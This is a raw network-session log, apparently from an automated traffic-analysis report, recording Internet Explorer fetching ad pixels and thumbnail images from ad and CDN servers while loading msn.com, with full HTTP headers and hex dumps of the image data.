                                                                                                                                                                                                                                  2021-09-10 09:11:39 UTC | 1 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Fri, 10 Sep 2021 09:11:39 GMT
                                                                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                                                                  Content-Length: 10055
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Cache-Control: public, max-age=1800, must-revalidate
                                                                                                                                                                                                                                  Etag: "9e65f2af141ca0a7e5ebc06696b0cdb5"
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Via: 1.1 google
                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                  Age: 210
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9OQbtRbhsekuSTqtBAfXn7cRxoAWY574NwKeDpvxwZQn9Z%2BFaV8pLOfex2cO9O8deBy2BcUbCBB7y%2FSt6kfm3WomDfDUfg37bLhkdFPMjZsxY8h7acu7RBGgyahbOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 68c787b5a9d14e37-FRA


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.7 | 49748 | 104.26.2.70 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-10 09:11:39 UTC | 11 | OUT | GET /px.gif?ch=1&e=0.7442770494067928 HTTP/1.1
                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                  Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  Host: ad-delivery.net
                                                                                                                                                                                                                                  Connection: Keep-Alive
2021-09-10 09:11:39 UTC | 12 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Fri, 10 Sep 2021 09:11:39 GMT
                                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                                  Content-Length: 43
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  X-GUploader-UploadID: ABg5-UzSZ-Kt1WbGdd88HlCnZf7YcJGLu-DR5tPwPS9bXoxAsvJYwt4jGn6LAHoZbG34sctt0vecv7iFCJZExLBCcbRvF7nEjw
                                                                                                                                                                                                                                  Expires: Fri, 10 Sep 2021 10:08:09 GMT
                                                                                                                                                                                                                                  Last-Modified: Wed, 05 May 2021 19:25:32 GMT
                                                                                                                                                                                                                                  ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
                                                                                                                                                                                                                                  x-goog-generation: 1620242732037093
                                                                                                                                                                                                                                  x-goog-metageneration: 5
                                                                                                                                                                                                                                  x-goog-stored-content-encoding: identity
                                                                                                                                                                                                                                  x-goog-stored-content-length: 43
                                                                                                                                                                                                                                  x-goog-hash: crc32c=cpEfJQ==
                                                                                                                                                                                                                                  x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
                                                                                                                                                                                                                                  x-goog-storage-class: MULTI_REGIONAL
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
                                                                                                                                                                                                                                  Age: 210
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X8B8Eyboq76YxOr9D%2B%2Bpg6B4rEAQ701Xid%2FVxNGW%2Fm%2B3jZ7fWRkwKs3dUpdvUw%2BpRQQLaHSniCa66fIBtAt6sCldz1gk0jVViHNAOO8WZ8wON4caL6AmQetyGh3%2FzJygoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 68c787b848ca440d-FRA
2021-09-10 09:11:39 UTC | 13 | IN | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff
Data Ascii: GIF89a
2021-09-10 09:11:39 UTC | 13 | IN | Data Raw: 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
Data Ascii: !,L;


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.7 | 49745 | 172.217.19.102 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-10 09:11:39 UTC | 13 | OUT | GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1
                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                  Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  Host: ad.doubleclick.net
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Cookie: IDE=AHWqTUmLaOp9iEghuZm4P0dJw9hUfO3C-7WsvHHj8XxLUXDn8JvgU1zZASjuR4p3
2021-09-10 09:11:39 UTC | 13 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: image/x-icon
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Content-Length: 1078
                                                                                                                                                                                                                                  Date: Thu, 09 Sep 2021 21:17:38 GMT
                                                                                                                                                                                                                                  Expires: Fri, 10 Sep 2021 21:17:38 GMT
                                                                                                                                                                                                                                  Last-Modified: Tue, 08 May 2012 13:08:06 GMT
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: sffe
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Age: 42841
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.7 | 49776 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-10 09:11:43 UTC | 15 | OUT | GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F07804453bf90da635cf952e3d393ab12.png HTTP/1.1
                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                  Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  Host: img.img-taboola.com
                                                                                                                                                                                                                                  Connection: Keep-Alive
2021-09-10 09:11:43 UTC | 17 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 23695
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                  edge-cache-tag: 610086439231269245217660850497464048231,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                                                                                                                                                                                                  etag: "fb1a38af3e936cc846bcce134fd77093"
                                                                                                                                                                                                                                  expiration: expiry-date="Thu, 09 Sep 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days"
                                                                                                                                                                                                                                  last-modified: Mon, 09 Aug 2021 14:28:18 GMT
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  x-ratelimit-limit: 101
                                                                                                                                                                                                                                  x-ratelimit-remaining: 100
                                                                                                                                                                                                                                  x-ratelimit-reset: 1
                                                                                                                                                                                                                                  x-envoy-upstream-service-time: 31
                                                                                                                                                                                                                                  X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb804
                                                                                                                                                                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Date: Fri, 10 Sep 2021 09:11:43 GMT
                                                                                                                                                                                                                                  Age: 1618786
                                                                                                                                                                                                                                  X-Served-By: cache-wdc5568-WDC, cache-dca17725-DCA, cache-hhn4039-HHN
                                                                                                                                                                                                                                  X-Cache: HIT, MISS, HIT
                                                                                                                                                                                                                                  X-Cache-Hits: 1, 0, 1
                                                                                                                                                                                                                                  X-Timer: S1631265103.357958,VS0,VE1
                                                                                                                                                                                                                                  Vary: ImageFormat
                                                                                                                                                                                                                                  X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F07804453bf90da635cf952e3d393ab12.png
                                                                                                                                                                                                                                  X-vcl-time-ms: 1


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.7 | 49777 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-10 09:11:43 UTC | 16 | OUT | GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F26b7c43e8735f7408c60e41fb7e91ecd.jpg HTTP/1.1
                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                  Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  Host: img.img-taboola.com
                                                                                                                                                                                                                                  Connection: Keep-Alive
2021-09-10 09:11:43 UTC | 41 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 15272
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                  edge-cache-tag: 493642289073061537158285669850804200228,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                                                                                                                                                                                                  etag: "3d15488c4e13b562df2958c9c5dfbc8a"
                                                                                                                                                                                                                                  expiration: expiry-date="Tue, 24 Aug 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days"
                                                                                                                                                                                                                                  last-modified: Sat, 24 Jul 2021 05:23:43 GMT
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  x-ratelimit-limit: 101
                                                                                                                                                                                                                                  x-ratelimit-remaining: 100
                                                                                                                                                                                                                                  x-ratelimit-reset: 1
                                                                                                                                                                                                                                  x-envoy-upstream-service-time: 9
                                                                                                                                                                                                                                  X-backend-name: US_DIR:3FP7YNX3LMizprTZsG7BSW--F_US_nlb103
                                                                                                                                                                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Date: Fri, 10 Sep 2021 09:11:43 GMT
                                                                                                                                                                                                                                  Age: 1641675
                                                                                                                                                                                                                                  X-Served-By: cache-wdc5553-WDC, cache-dca17720-DCA, cache-hhn4042-HHN
                                                                                                                                                                                                                                  X-Cache: HIT, HIT, HIT
                                                                                                                                                                                                                                  X-Cache-Hits: 1, 1, 1
                                                                                                                                                                                                                                  X-Timer: S1631265103.363562,VS0,VE1
                                                                                                                                                                                                                                  Vary: ImageFormat
                                                                                                                                                                                                                                  X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F26b7c43e8735f7408c60e41fb7e91ecd.jpg
                                                                                                                                                                                                                                  X-vcl-time-ms: 1


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.7 | 49779 | 87.248.118.23 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-10 09:11:43 UTC | 16 | OUT | GET /lo/api/res/1.2/BWUYr.M5U6.kf035wsX8Lg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1pbmk7cT0xMDA-/https://s.yimg.com/av/ads/1621266752856-586.jpg HTTP/1.1
                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                  Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  Host: s.yimg.com
                                                                                                                                                                                                                                  Connection: Keep-Alive
2021-09-10 09:11:43 UTC | 58 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Length: 195845
                                                                                                                                                                                                                                  Access-Control-Allow-Headers: X-Requested-With
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                  Edge-Cache-Tag: 343450606465613470501122455183989970294,415930648339712111872285657998251086336,ae7a14591aaf8d474cdb3f92111c923e
                                                                                                                                                                                                                                  Etag: "441833de41dfe8d94ac6f8ce4e751eba"
                                                                                                                                                                                                                                  Last-Modified: Fri, 18 Jun 2021 09:15:35 GMT
                                                                                                                                                                                                                                  Server: ATS
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Date: Thu, 02 Sep 2021 21:11:05 GMT
                                                                                                                                                                                                                                  X-Served-By: cache-wdc5543-WDC
                                                                                                                                                                                                                                  X-Cache: HIT
                                                                                                                                                                                                                                  X-Cache-Hits: 1
                                                                                                                                                                                                                                  X-Timer: S1630617066.900811,VS0,VE1
                                                                                                                                                                                                                                  Age: 648038
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  cld_cache: HIT
                                                                                                                                                                                                                                  cld_hits: 1
                                                                                                                                                                                                                                  cld_by: cache-wdc5543-WDC
                                                                                                                                                                                                                                  cld_latency: 1
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"
                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Data Ascii: VLp$v`xTg7krh&L4m*0-#<+IjsgkM'KA{n^SRGU#;XJkg\$A`$T]X4M}]{g`@.KI!N].|}~Mt"wmm[0Y.@m<_[H(
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC107INData Raw: 4e 6c 29 00 1b 00 74 fa a6 4b 9c 82 31 83 4c eb 70 43 74 8a 65 09 f2 e6 b0 41 4a 41 0c c1 9e c4 b5 00 ce e2 ba bc 5a ff 00 a5 7f 55 cf a9 74 41 8b 93 34 9f 79 86 bd bc 9c 3c b5 3d f0 40 65 77 87 79 0e 51 4a 9b 56 ff 00 96 69 6c fb 6e 82 74 93 2e 61 52 43 8b 9c 9a f7 ca d9 f9 c5 e4 b9 ff 00 f1 a7 10 f3 db 2c e8 6f 7a e5 19 3d 6f 22 98 b7 ad 80 d1 6e 0b c0 24 15 f2 c6 fc 8b a2 0d 11 f0 08 e7 ae ca 75 ad ca 5a df bf 48 ea e6 02 95 95 16 18 58 0c 85 bc cb 0e ba eb c6 bf ea b3 22 2c a8 b5 38 20 76 de 90 65 23 10 48 ed 07 1b 48 24 1b 25 87 e3 e7 c8 ae b7 5f 44 18 4a 15 90 21 c0 2d 60 7a e6 6b 9f 9c 7c e3 fd 54 13 f6 b1 3d 58 b0 a9 35 2d d3 53 d3 78 a8 1f 45 f0 de 26 d6 de 29 0a 49 87 a0 e7 64 b2 d3 05 91 42 b8 f2 47 bb 79 e2 f9 20 7e 4d f5 a9 e3 66 ff 00 c9 2c
                                                                                                                                                                                                                                  Data Ascii: Nl)tK1LpCteAJAZUtA4y<=@ewyQJVilnt.aRC,oz=o"n$uZHX",8 ve#HH$%_DJ!-`zk|T=X5-SxE&)IdBGy ~Mf,
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC108INData Raw: 0d f3 cd 9b 20 f3 7e 3f b7 53 62 a1 ab 53 da dd f9 c4 66 29 88 c3 4a 39 e6 fd da 3c c2 ee f9 71 34 a4 18 e2 dc ca bf ff 00 70 81 45 ec 73 b0 0d ab 5c 8b f9 ab ea 18 b0 97 35 06 8c ce db df 63 e6 da 44 89 0b b9 7d 32 af a6 5c fd d8 8d 72 12 0d 3f 27 30 b2 21 58 e4 a7 73 4b 19 20 f3 5c 8f 68 14 07 fa d9 3c f5 d1 35 c8 0d 5c a9 e7 99 6d 22 65 49 4a 14 40 6b 3e 7e 57 f4 ae d0 a5 c8 d3 8e a5 e8 dd 6b 2e 62 84 6a 2f 93 2c 25 2a 39 47 72 56 08 1d b9 3e f1 b6 b9 bb 37 e2 ba e4 c2 e3 c1 d4 dc d4 6f a7 7a c7 65 a0 25 27 c2 c1 4e 5a c0 96 bb de fd d6 39 cf fd 42 e4 31 c9 9f 1d f1 d1 22 6c 56 c0 8a a9 5d e4 d2 f0 63 95 91 da c8 67 ee 9f dd f2 cf 55 d2 f6 77 a3 50 be de fe 65 f2 86 78 64 a4 a0 92 2a fa 9f cc 51 4d 7f 6f d9 be 6c f0 fd b4 10 c7 0a 29 5f 79 79 c8 2c 51
                                                                                                                                                                                                                                  Data Ascii: ~?SbSf)J9<q4pEs\5cD}2\r?'0!XsK \h<5\m"eIJ@k>~Wk.bj/,%*9GrV>7oze%'NZ9B1"lV]cgUwPexd*QMol)_yy,Q
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC109INData Raw: 62 48 49 05 3f c5 b4 7f 2f 3e a6 2b 27 af bf a7 18 5f 38 e7 45 8f 1c 2f 04 60 77 60 75 8e 58 c4 8c 54 c1 90 42 85 c9 46 67 2a 21 90 37 b7 95 23 a7 a5 f1 e6 cf 93 75 a6 bc e2 ba 6f d1 d0 6a 12 2a 1a e6 83 5d 29 7f 38 af 7e a9 fa 43 ea 4f 4c 47 da c2 93 bb 8a ec 09 82 2b df 01 3c d4 48 c0 fe 88 6a 61 18 62 10 ee 08 00 34 0c 8e 26 5c e2 c4 87 19 be 56 af a5 75 ea f5 fc 47 d3 54 84 b2 72 a7 2e 57 d9 f9 c0 1c 30 e4 e2 b3 0d 46 16 8b 23 2a 3f b1 cb 0a f6 32 31 92 c7 dd 43 1b 9d b0 e4 23 00 ca e9 db 70 e8 39 f1 66 58 41 05 8d d8 fb 3f eb fb 02 b4 c8 9b 2c 86 c5 fc 9d 54 26 97 66 fc 5b 68 7c 7a 2b d4 92 61 c3 8a 99 19 59 ee d8 ad 8c 94 36 9c a9 22 73 b1 33 06 de dc 86 68 15 52 7e e3 34 a3 bb 1f 8b 20 f5 5b c4 48 0a 2e c1 41 ad 4a d6 a5 89 a5 8f b4 5c 70 b3 56 90
                                                                                                                                                                                                                                  Data Ascii: bHI?/>+'_8E/`w`uXTBFg*!7#uoj*])8~COLG+<Hjab4&\VuGTr.W0F#*?21C#p9fXA?,T&f[h|z+aY6"s3hR~4 [H.AJ\pV
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC110INData Raw: 83 12 7c b6 ee 07 0a d6 b9 1e d6 23 69 2b 40 f3 d2 b8 d5 35 d9 4b 20 12 05 ad b5 3d 9e 3b 2f fe 33 85 41 2e 6c f7 b5 ad ea 2a 2a f1 a1 f4 0f ea fe 87 eb 5f 4b 61 7a 8f 07 2a 32 fe a2 d5 b5 cc cc 42 65 86 db 1a 1c e9 61 85 11 51 88 58 9b 15 16 66 63 65 9e 41 cf 3c 31 25 0a 5c b7 96 a5 20 24 5c e7 e7 5a f2 a0 36 8f 4f 9a 12 b0 95 00 b0 a2 28 f4 0f 6a 8d cf 9d 61 df eb 1f ab 3a 67 a6 b0 61 79 35 1c 75 cd ca 30 e0 e0 44 d2 20 99 b2 73 19 62 87 b4 a8 41 0a af 6c ec 17 f6 a9 fc 75 5d 37 8a 58 51 48 05 d3 e1 7d 4f ef 95 c0 6a 43 a9 94 82 00 05 81 0e d4 27 d5 cd b7 f4 8f be 96 f5 f6 26 b1 af 36 3c 19 63 2b fc 0f 18 0c d9 99 dd d1 f5 4c 88 c1 78 42 a0 55 ff 00 86 c7 06 53 bf 73 5c c8 68 58 3d 37 2a 72 95 2c a8 50 d2 ed ae 8d 56 f7 bc 75 52 e5 cb c2 4a 99 ed 4d 0b
                                                                                                                                                                                                                                  Data Ascii: |#i+@5K =;/3A.l**_Kaz*2BeaQXfceA<1%\ $\Z6O(ja:gay5u0D sbAlu]7XQH}OjC'&6<c+LxBUSs\hX=7*r,PVuRJM
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC112INData Raw: 09 2c 29 4f 7e d9 f4 8b 65 a5 fc 40 b2 54 94 b8 34 27 b7 b0 f8 80 a4 2d 8d a9 4d 8a cc 64 c7 c9 46 fb 7c 94 92 35 40 56 59 25 8d 24 5f fa e1 b5 8e 87 35 e0 71 d1 56 4e 17 50 77 b6 5d f3 e5 d1 54 61 42 8a 19 d2 a3 e1 d8 8a 13 7d e8 7d 22 48 e5 48 b9 78 f9 1d c9 0c 43 27 12 75 03 73 73 97 fa 2e 0d 0b 05 5c 7c 55 73 c0 b1 d7 25 aa 59 49 01 2c 75 06 b9 8b 16 a7 cc 79 69 50 38 83 35 9b 63 7e f6 e9 0c 9c 5c c7 c3 c9 c7 ec 48 e9 1a 65 bf 6c b5 6d fb 7c 85 1b ad 47 36 1b 70 36 4f 8b 3f 1d 0d 78 ac ec 08 a8 a5 76 e5 ae b0 4c 60 61 0d 84 93 c8 be 5c f9 fc c5 85 fa 5f ae 2c f3 65 69 59 51 ee 04 49 03 47 b8 c7 14 8b 36 d1 1c c5 cd 31 68 9b de a2 bc f8 3e 3a f4 b7 72 1f 27 1b 1b 77 cd b2 85 26 a0 a8 e2 50 71 5a 35 3b 7e 7d 22 f8 7d 30 f5 06 3e 26 0b e1 fe ac f3 63 42
                                                                                                                                                                                                                                  Data Ascii: ,)O~e@T4'-MdF|5@VY%$_5qVNPw]TaB}}"HHxC'uss.\|Us%YI,uyiP85c~\Helm|G6p6O?xvL`a\_,eiYQIG61h>:r'w&PqZ5;~}"}0>&cB
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC113INData Raw: 91 cf c7 84 d4 83 32 e0 87 a5 b5 61 5b c5 a4 bc 25 2c 54 41 2e df 01 b9 d7 d6 18 43 d7 f8 7a 27 dd c6 ce b1 40 ec 21 02 49 14 45 59 1b 42 db 35 6d de ae 76 dd 1d fe 2a ba 51 69 53 94 91 b3 8d f7 b7 a6 9a b4 58 cb 57 db 97 5f 11 a5 49 ad 41 b0 0c 34 f9 30 09 9d fd 44 7a 7f d2 da 8e 3e 87 93 9f 1a 3a e3 c8 d8 4f 3c dd a1 52 12 b1 c0 ee cc 29 e2 c8 e1 18 5a 85 91 18 1a 6a 30 32 15 3c 84 cb 49 2f e7 76 a6 b6 f3 d0 3c 4c f1 89 4b ae 6a d2 92 2a 00 50 67 a5 df bd 0c 24 7e a8 ff 00 5c 1e 9f c4 f4 ab 27 f8 ac 30 6a ba 7b c9 11 08 ed 24 e5 77 32 4e 90 c3 13 33 ca d8 d2 ad 4d 10 16 51 ac 02 48 1d 58 70 1f 44 e3 27 4d c2 99 65 89 f0 9a bb 6e 05 28 6b d2 29 fe a1 fe a4 e1 38 54 87 98 09 17 18 9d b3 d0 e6 ed f3 15 83 27 ff 00 6a 5b e2 e9 59 da 37 da e7 4f 3b 42 62 8b
                                                                                                                                                                                                                                  Data Ascii: 2a[%,TA.Cz'@!IEYB5mv*QiSXW_IA40Dz>:O<R)Zj02<I/v<LKj*Pg$~\'0j{$w2N3MQHXpD'Men(k)8T'j[Y7O;Bb
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC114INData Raw: 2e 59 55 1b 9a 64 f9 6b 78 8a 8a ee d6 a3 d5 b9 12 3a 67 e5 95 60 f5 d6 9b 91 99 98 9f 66 8d 34 98 12 38 8d d5 54 76 a3 c8 85 a1 c8 db 26 d6 12 49 20 2b b5 ae fb 28 57 cb 74 d4 89 a9 25 9e 81 c0 dc d6 97 f2 8e 2e 52 8a 42 88 04 ef a8 ea fa f2 3e 70 84 d7 3d 0f 97 a8 f6 cb 33 62 45 0e 53 34 c2 ca 3e e5 56 64 62 2c 1a 90 1b 60 37 2b 1a b3 7c 74 e2 54 93 4a ed d9 bd f6 b1 d2 02 bc bc e8 6b 4e 99 5f ce 04 72 7e 9e fa 75 0c 32 65 e2 c5 9b 2a 20 57 ee fb 90 d0 3b 49 05 88 24 b7 34 41 22 f8 af 83 30 a1 24 84 80 03 0a 3e 75 be b9 01 f3 0a 2b f9 2a 99 9a 6d 13 f8 1a 7e 16 99 8a 82 28 a3 c5 8c 01 ba 38 23 45 25 81 f6 01 c7 80 9c 13 e7 f1 d7 66 2c 2c 06 52 a9 46 7d cf 2c a9 e9 ac 78 84 84 38 03 1e 26 e4 29 db fa 5a 05 7d 5d f5 13 40 f4 8e 9f 95 a8 6a 5a 86 2e 14 18
                                                                                                                                                                                                                                  Data Ascii: .YUdkx:g`f48Tv&I +(Wt%.RB>p=3bES4>Vdb,`7+|tTJkN_r~u2e* W;I$4A"0$>u+*m~(8#E%f,,RF},x8&)Z}]@jZ.
